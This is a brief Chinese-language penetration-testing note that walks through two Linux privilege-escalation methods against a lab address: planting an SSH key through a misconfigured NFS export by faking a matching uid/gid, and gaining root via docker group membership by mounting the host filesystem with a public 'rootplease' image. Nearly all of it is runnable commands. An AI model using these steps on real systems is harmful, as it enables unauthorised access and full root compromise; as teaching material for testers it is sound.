nfs 挂载提权 + docker 用户组提权

nfs 挂载提权

目标机器192.168.206.143 需开启2049 nfs端口

在攻击机kali安装nfs:

sudo apt-get install nfs-common

查看目标开放的文件夹

showmount -e 192.168.206.143

回显：/home/peter *  说明可挂载/home/peter的所有目录

创建用户（root权限下）

1. 在本机创建一个peter用户并且uid为1001 gid为1005即可

2. 创建组并指定组GID：

3. groupadd -g 1005 peter

4. 创建用户并指定uid以及gid:

5. adduser peter -uid 1001 -gid 1005

 

生成公钥和私钥

ssh-keygen

将公钥复制到创建的挂载目录下

cat /home/peter/.ssh/id_rsa.pub > /111/.ssh/authorized_keys 

赋值权限

chmod 700 .ssh

chmod 600 authorized_keys

 

用ssh 连接

ssh [email protected]

docker 提权

Docker 运行的所有命令都是需要 sudo 来运行，那是因为 docker 需要 root 权限才能跑。

Docker 监护进程有一个特性，它能被允许访问 root 用户或者是在 docker 组里面的所有用户，这就如同拥有 root 的访问权限。

如果一个服务器有一个普通的用户，并且这个用户加入了 docker 组，则这个用户已经是 root 了，默认情况下，Docker 软件包是会默认添加一个 docker 用户组

命令: id  查看当前用户组信息

查看用户组  cat /etc/group

提权（需要能够从外网拉镜像）：

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease